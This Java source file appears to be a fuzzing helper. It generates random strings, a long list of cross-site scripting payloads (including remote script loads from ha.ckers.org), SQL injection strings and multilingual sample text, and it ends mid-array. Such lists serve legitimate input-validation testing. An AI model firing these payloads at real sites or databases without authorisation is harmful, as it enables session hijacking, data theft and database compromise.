package at.stringpaster;

import java.util.Random;

public class stringGenerator {
	public static int randInt(int min, int max) {
		Random rand = new Random();
		int randomNum = rand.nextInt((max - min) + 1) + min;
		return randomNum;
	}

	public static boolean getRandomBoolean() {
		return Math.random() < 0.5;
	}

	public static String getRandomString(Integer maxLength) {
		String result = "";
		Integer resultLength = (int) randInt(10, maxLength);
		for (Integer i = 0; i < resultLength; i++) {
			Integer randomNumber = (int) randInt(0, 100);
			if (randomNumber < 60) {
				result += Character.toString((char) (randInt(0, 500)));
			} else if (randomNumber < 80) {
				result += Character.toString((char) (randInt(500, 1000)));
			} else {
				result += Character.toString((char) (randInt(0, 65535)));
			}
		}
		return result;
	}

	public static String getRandomXss() {
		String possible[] = {
				"\"<script>alert(123)</script>",
				"&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;",
				"<img src=x onerror=alert(123) />",
				"<svg><script>123<1>alert(123)</script> ",
				"\"><script>alert(123)</script>",
				"'><script>alert(123)</script>",
				"><script>alert(123)</script>",
				"</script><script>alert(123)</script>",
				"< / script >< script >alert(123)< / script >",
				" onfocus=JaVaSCript:alert(123) autofocus ",
				"\" onfocus=JaVaSCript:alert(123) autofocus ",
				"' onfocus=JaVaSCript:alert(123) autofocus ",
				"＜script＞alert(123)＜/script＞",
				"<sc<script>ript>alert(123)</sc</script>ript>",
				"--><script>alert(123)</script>",
				"\";alert(123);t=\"",
				"';alert(123);t='",
				"JavaSCript:alert(123)",
				";alert(123);",
				"src=JaVaSCript:prompt(132)",
				"\"><script>alert(123);</script x=\"",
				"'><script>alert(123);</script x='",
				"><script>alert(123);</script x=",
				"\" autofocus onkeyup=\"javascript:alert(123)",
				"' autofocus onkeyup='javascript:alert(123)",
				"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>",
				"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>",
				"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>",
				"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>",
				"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>",
				"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>",
				"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>",
				"'`\"><\\x3Cscript>javascript:alert(1)</script>        ",
				"'`\"><\\x00script>javascript:alert(1)</script>",
				"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF",
				"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF",
				"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
				"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>",
				"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>",
				"\"`'><script>\\x3Bjavascript:alert(1)</script>",
				"\"`'><script>\\x0Djavascript:alert(1)</script>",
				"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>",
				"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>",
				"\"`'><script>\\x09javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>",
				"\"`'><script>\\x00javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>",
				"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>",
				"\"`'><script>\\x0Cjavascript:alert(1)</script>",
				"\"`'><script>\\x2Bjavascript:alert(1)</script>",
				"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>",
				"\"`'><script>-javascript:alert(1)</script>",
				"\"`'><script>\\x0Ajavascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>",
				"\"`'><script>\\x7Ejavascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>",
				"\"`'><script>\\xC2\\x85javascript:alert(1)</script>",
				"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>",
				"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>",
				"\"`'><script>\\x21javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>",
				"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>",
				"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>",
				"\"`'><script>\\x0Bjavascript:alert(1)</script>",
				"\"`'><script>\\x20javascript:alert(1)</script>",
				"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>",
				"<img \\x00src=x onerror=\"alert(1)\">",
				"<img \\x47src=x onerror=\"javascript:alert(1)\">",
				"<img \\x11src=x onerror=\"javascript:alert(1)\">",
				"<img \\x12src=x onerror=\"javascript:alert(1)\">",
				"<img\\x47src=x onerror=\"javascript:alert(1)\">",
				"<img\\x10src=x onerror=\"javascript:alert(1)\">",
				"<img\\x13src=x onerror=\"javascript:alert(1)\">",
				"<img\\x32src=x onerror=\"javascript:alert(1)\">",
				"<img\\x47src=x onerror=\"javascript:alert(1)\">",
				"<img\\x11src=x onerror=\"javascript:alert(1)\">",
				"<img \\x47src=x onerror=\"javascript:alert(1)\">",
				"<img \\x34src=x onerror=\"javascript:alert(1)\">",
				"<img \\x39src=x onerror=\"javascript:alert(1)\">",
				"<img \\x00src=x onerror=\"javascript:alert(1)\">",
				"<img src\\x09=x onerror=\"javascript:alert(1)\">",
				"<img src\\x10=x onerror=\"javascript:alert(1)\">",
				"<img src\\x13=x onerror=\"javascript:alert(1)\">",
				"<img src\\x32=x onerror=\"javascript:alert(1)\">",
				"<img src\\x12=x onerror=\"javascript:alert(1)\">",
				"<img src\\x11=x onerror=\"javascript:alert(1)\">",
				"<img src\\x00=x onerror=\"javascript:alert(1)\">",
				"<img src\\x47=x onerror=\"javascript:alert(1)\">",
				"<img src=x\\x09onerror=\"javascript:alert(1)\">",
				"<img src=x\\x10onerror=\"javascript:alert(1)\">",
				"<img src=x\\x11onerror=\"javascript:alert(1)\">",
				"<img src=x\\x12onerror=\"javascript:alert(1)\">",
				"<img src=x\\x13onerror=\"javascript:alert(1)\">",
				"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">",
				"<img src=x onerror=\\x09\"javascript:alert(1)\">",
				"<img src=x onerror=\\x10\"javascript:alert(1)\">",
				"<img src=x onerror=\\x11\"javascript:alert(1)\">",
				"<img src=x onerror=\\x12\"javascript:alert(1)\">",
				"<img src=x onerror=\\x32\"javascript:alert(1)\">",
				"<img src=x onerror=\\x00\"javascript:alert(1)\">",
				"<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>",
				"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>",
				"<img src onerror /\" '\"= alt=javascript:alert(1)//\">",
				"<title onpropertychange=javascript:alert(1)></title><title title=>",
				"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">",
				"<!--[if]><script>javascript:alert(1)</script -->",
				"<!--[if<img src=x onerror=javascript:alert(1)//]> -->",
				"<script src=\"/\\%(jscript)s\"></script>",
				"<script src=\"\\\\%(jscript)s\"></script>",
				"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
				"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
				"<IMG SRC=# onmouseover=\"alert('xxs')\">",
				"<IMG SRC= onmouseover=\"alert('xxs')\">",
				"<IMG onmouseover=\"alert('xxs')\">",
				"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
				"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
				"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
				"<IMG SRC=\"jav   ascript:alert('XSS');\">",
				"<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
				"<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
				"<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
				"perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out",
				"<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
				"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
				"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
				"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
				"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
				"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
				"<SCRIPT SRC=//ha.ckers.org/.j>",
				"<IMG SRC=\"javascript:alert('XSS')\"",
				"<iframe src=http://ha.ckers.org/scriptlet.html <",
				"\\\";alert('XSS');//\"" };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}

	public static String getRandomSQL() {
		String possible[] = { "admin'--", "; SELECT * FROM users;",
				"anything' OR 'x'='x", "x' AND email IS NULL; --",
				"x' AND userid IS NULL; --",
				"x' AND 1=(SELECT COUNT(*) FROM users); --",
				"x' AND users.email IS NULL; --", "1 or 1=1 --",
				"1 or '1'='1' --", "23 OR 1=1", "1' or 1=1 /*", "23 AND 1=2",
				"'OR''='", "1' UNION ALL SELECT 1 --",
				"SELECT BENCHMARK(1000000,MD5(‘A’));",
				"SELECT IF (1=1, ‘true’, ‘false’)", "@@version", "version()",
				"5 union all select 1,unhex(hex(@@version)),3/*",
				"1' and substr(@@version,1)>3 --",
				"5 and substring(@@version,1,1)=4" };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}

	public static String getRandomLanguage() {
		String possible[] = {
				"Hierdie aanbod is nie aanvaarbaar nie. Ek wil jou vra om die bedrag in te samel om 'n minimum van 500 €. Ferry ritte sal my ten minste die helfte van die voorgestelde koers (vooruit betaal) kos. Die bestuurder het GPS dop, registrasienommer DW29911. Asseblief terugvoering mojemail@emailowo.com of kontak deur die http://randomwebsite.com/cgi-bin/random.pl. Telefoonnommer +48 (71) 722 11 10. Company Vervoer & Transportowo sp. sp. k.",
				"Kjo ofertë nuk është e pranueshme. Unë do t'ju kërkojë për të rritur shumën që një minimum prej 500 €. Rides traget do të më kushtojë të paktën gjysmën e normës së propozuar (paguar paraprakisht). Shoferi ka GPS ndjekja, numri i regjistrimit DW29911. Ju lutem reagime mojemail@emailowo.com~~HEAD=dobj apo kontaktin nga http://randomwebsite.com/cgi-bin/random.pl~~pobj. Numri i telefonit +48 (71) 722 11 10. Transport Company & Transportowo sp. sp. k.",
				"هذا العرض غير مقبول. أود أن أطلب منكم لرفع المبلغ إلى الحد الأدنى من 500 €. وركوب العبارة كلفني لا يقل عن نصف المعدل المقترح (المدفوعة مقدما). السائق تتبع نظام تحديد المواقع، ورقم التسجيل DW29911. ردود الفعل إرضاء mojemail@emailowo.com أو الاتصال به http://randomwebsite.com/cgi-bin/random.pl. رقم الهاتف +48 (71) 722 11 10. شركة النقل وTransportowo ليرة سورية. س. ك.",
				"Այս առաջարկը ընդունելի չէ: Ես կխնդրեի ձեզ բարձրացնել գումարը նվազագույնը 500 €. Ferry rides կարժենա ինձ առնվազն կեսը առաջարկվող տոկոսադրույքը (վճարովի նախօրոք). Վարորդը ունի GPS արբանյակային վերահսկողության, գրանցման համարը DW29911. Խնդրում ենք հետադարձ mojemail@emailowo.com կամ դիմեք կողմից http://randomwebsite.com/cgi-bin/random.pl. Հեռախոսահամար +48 (71) 722 11 10. Ընկերության Transport & Transportowo SP. SP. k.",
				"Bu təklif məqbul deyil. Mən 500 € minimum məbləği artırmaq üçün xahiş edirik. Ferry Rides mənə (qabaqcadan ödənilir) ən azı yarım təklif dərəcəsi başa gələcək. sürücü GPS izleme, qeydiyyat nömrəsi DW29911 var. Http://randomwebsite.com/cgi-bin/random.pl rəy mojemail@emailowo.com ya müraciət edin. Telefon nömrəsi +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"Eskaintza hau ez da onargarria. Kopuru igotzeko 500 € gutxienez duzun galdetuko nuke. Ferry ibilaldiak kostua izango me gutxienez erdia proposatutako tasa (aldez aurretik ordaindu). Gidariaren GPS jarraipena, matrikula DW29911 ditu. Mesedez iritzia mojemail@emailowo.com edo kontaktu http://randomwebsite.com/cgi-bin/random.pl arabera. Telefono zenbakia +48 (71) 722 11 10 Enpresaren Transport & Transportowo sp. sp. k.",
				"Гэта прапанова не з'яўляецца прымальным. Я хацеў бы папрасіць вас, каб падняць суму мінімум 500 €. На пароме будзе каштаваць мне па меншай меры палову прапанаванага хуткасць (аплачваецца загадзя). Кіроўца мае GPS сачэння, рэгістрацыйны нумар DW29911. Калі ласка, зваротная сувязь mojemail@emailowo.com~~HEAD=dobj або Звяртацца па http://randomwebsite.com/cgi-bin/random.pl~~pobj. Тэлефон +48 (71) 722 11 10. Кампанія Транспарт & Transportowo зр. зр. к.",
				"এই অফার গ্রহণযোগ্য নয়. আমি 500 € একটি ন্যূনতম পরিমাণ বাড়াতে আপনাকে জিজ্ঞাসা করবে. ফেরি ভর আমাকে (অগ্রিম দেওয়া) অন্তত অর্ধেক প্রস্তাবিত হার খরচ হবে. চালক GPS ট্র্যাকিং, রেজিস্ট্রেশন নম্বর DW29911 আছে. Http://randomwebsite.com/cgi-bin/random.pl দ্বারা মতামত mojemail@emailowo.com বা যোগাযোগ করুন. ফোন নম্বর +48 (71) 722 11 10 কোম্পানি পরিবহন ও Transportowo এসপি. এসপি. K.",
				"Ova ponuda nije prihvatljivo. Zamolio bih vas da se podigne iznos koji najmanje 500 €. Trajekt vozi će me koštati najmanje pola predloženim stopa (plaća unaprijed). Vozač ima GPS praćenje, matični broj DW29911. Please povratne mojemail@emailowo.com ili kontakt od strane http://randomwebsite.com/cgi-bin/random.pl. Telefonski broj +48 (71) 722 11 10. poduzeća Transport & Transportowo sp. sp. k.",
				"Тази оферта не е приемлива. Бих ви помолил да се повиши количеството на минимум 500 €. Фериботни вози ще ми струва най-малко половината от предложената ставка (заплаща предварително). Шофьорът има GPS проследяване, регистрационен номер DW29911. Моля за обратна връзка или се свържете mojemail@emailowo.com от http://randomwebsite.com/cgi-bin/random.pl~~state=definite. Телефонен номер 48 (71) 722 11 10. Фирмата Транспорт & Transportowo сп. Sp. к.",
				"ការ​ផ្តល់​ជូន​នេះ​គឺ​ជា​ការ​មិន​អាច​ទទួល​យក​បាន​។ ខ្ញុំ​នឹង​សួរ​អ្នក​ក្នុង​ការ​បង្កើន​ចំនួន​ទឹកប្រាក់​អប្បបរមា​នៃ 500 €​មួយ​។ ជិះ​នាវា​ទេសចរណ៍​នឹង​ចំណាយ​ឱ្យ​ខ្ញុំ​នៅ​ពាក់​ក​ណ្តា​យ៉ាង​ហោច​ណាស់​មាន​អត្រា​នៃ​ការ​ស្នើសុំ (បង់​នៅ​ក្នុង​ជាមុន​) ។ កម្មវិធី​បញ្ជា​នេះ​មាន​ការ​តាមដាន GPS​, DW29911 លេខ​។ ផ្គាប់​ចិត្ដ​មតិ​អ្នក mojemail@emailowo.com ឬ​ទាក់ទង​ដោយ http://randomwebsite.com/cgi-bin/random.pl នេះ​។ ទូរស័ព្ទ​លេខ +48 (71​) 722 11 10. ក្រុមហ៊ុន​ដឹកជញ្ជូន & Transportowo SP ។ SP ។ K ។",
				"Aquesta oferta no és acceptable. Jo demanaria que augmentar la quantitat fins a un mínim de 500 €. Passejades en ferri em costarà almenys la meitat de la taxa proposada (pagat a la bestreta). El conductor té la localització per GPS, número de registre DW29911. Si us plau la regeneració mojemail@emailowo.com o contacte pel http://randomwebsite.com/cgi-bin/random.pl. Telèfon +48 (71) 722 11 10. Transport i Transportowo Companyia sp. sp. k.",
				"Mwayi umenewu si zovomerezeka. Ndikufuna ndikufunseni inu kulera kuchuluka kwa osachepera 500 €. Bwato wakwera ndalama ine osachepera theka akufuna mlingo (analipira pasadakhale). Dalaivala ali GPS kutsatira, nambala DW29911. Kusangalatsa mayankho mojemail@emailowo.com kapena kukhudzana ndi http://randomwebsite.com/cgi-bin/random.pl. Phone number +48 (71) 722 11 10. Company Transport & Transportowo SP. SP. K.",
				"此优惠是不能接受的。我想请你提出的数额降至最低500€的。乘坐渡轮会花费我至少有一半的提议率（预付）。司机有GPS跟踪，注册号DW29911。请反馈mojemail@emailowo.com或接触被http://randomwebsite.com/cgi-bin/random.pl。电话号码：+48（71）722 11 10公司运输及Transportowo藻。 SP：K。",
				"此優惠是不能接受的。我想請你提出的數額降至最低500€的。乘坐渡輪會花費我至少有一半的提議率（預付）。司機有GPS跟踪，註冊號DW29911。請反饋mojemail@emailowo.com或接觸被http://randomwebsite.com/cgi-bin/random.pl。電話號碼：+48（71）722 11 10公司運輸及Transportowo藻。 SP：K。",
				"Ova ponuda nije prihvatljiva. Ja bih vas pitati podići iznos od najmanje 500 €. Vožnja brodom će me koštati najmanje pola predloženu cijenu (plaća se unaprijed). Vozač ima GPS praćenje, matični broj DW29911. Molim komentar mojemail@emailowo.com~~HEAD=dobj ili kontakt od strane http://randomwebsite.com/cgi-bin/random.pl~~pobj. Telefonski broj +48 (71) 722 11 10. Tvrtka Transport & Transportowo sp. sp. k.",
				"Tato nabídka není přijatelné. Chtěl bych vás požádat, abyste ke zvýšení částky, která má minimálně 500 €. Ferry jízdy mě bude stát nejméně polovinu navrhované sazby (platí se předem). Řidič má GPS sledování, registrační číslo DW29911. Prosím, zpětnou vazbu mojemail@emailowo.com~~HEAD=dobj nebo kontakt na http://randomwebsite.com/cgi-bin/random.pl~~pobj. Telefonní číslo +48 (71) 722 11 10. Společnost Transport & Transportowo sp. sp. k.",
				"Dette tilbud er ikke acceptabelt. Jeg vil bede dig om at hæve beløbet til et minimum på 500 €. Færge forlystelser vil koste mig mindst halvdelen den foreslåede sats (betales forud). Føreren har GPS tracking, registreringsnummer DW29911. Venligst tilbagemeldinger mojemail@emailowo.com eller kontakt ved http://randomwebsite.com/cgi-bin/random.pl. Telefonnummer +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"Deze aanbieding is niet aanvaardbaar. Ik wil u vragen om het bedrag te verhogen tot een minimum van 500 €. Veerboot ritten zal me ten minste de helft van de voorgestelde tarief (vooraf betaald) kosten. De bestuurder heeft GPS tracking, registratienummer DW29911. Gelieve feedback mojemail@emailowo.com of neem contact op met de http://randomwebsite.com/cgi-bin/random.pl. Telefoon +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"This offer is not acceptable. I would ask you to raise the amount to a minimum of 500 €. Ferry rides will cost me at least half the proposed rate (paid in advance). The driver has GPS tracking, registration number DW29911. Please feedback mojemail@emailowo.com or contact by the http://randomwebsite.com/cgi-bin/random.pl. Phone number +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"Tiu propono ne estas akceptata. Mi volus demandi vin levi la kvanton al minimumo de 500 €. Ferry rajdoj kostos mi almenaŭ duone la proponita imposto (pagita anticipe). La ŝoforo havas GPS sekvado, registra numero DW29911. Plaĉi sugestoj mojemail@emailowo.com aŭ detalo de la http://randomwebsite.com/cgi-bin/random.pl. Telefonnumero +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"See pakkumine ei ole vastuvõetav. Kutsun teid üles tõsta summa vähemalt 500 €. Ferry seljas maksab mulle vähemalt pool kavandatud määr (tasutakse ettemaksuna). Juht on GPS jälgimise, registreerimisnumber DW29911. Palun tagasisidet mojemail@emailowo.com või kontakti poolt http://randomwebsite.com/cgi-bin/random.pl. Telefoninumber +48 (71) 722 11 10. Ettevõte Transport ja TRANSPORTOWO sp. sp. k.",
				"Ang alok na ito ay hindi katanggap-tanggap. Gusto kong hilingin sa iyo na taasan ang halaga sa isang minimum na 500 €. Ferry rides ay gastos sa akin ng hindi bababa sa kalahati ng mga ipinanukalang rate (adelantado). Ang driver ay may GPS tracking, registration na numero DW29911. Mangyaring feedback mojemail@emailowo.com o contact sa pamamagitan ng mga http://randomwebsite.com/cgi-bin/random.pl. Phone number 48 (71) 722 11 10. Transport & Transportowo Company sp. sp. k.",
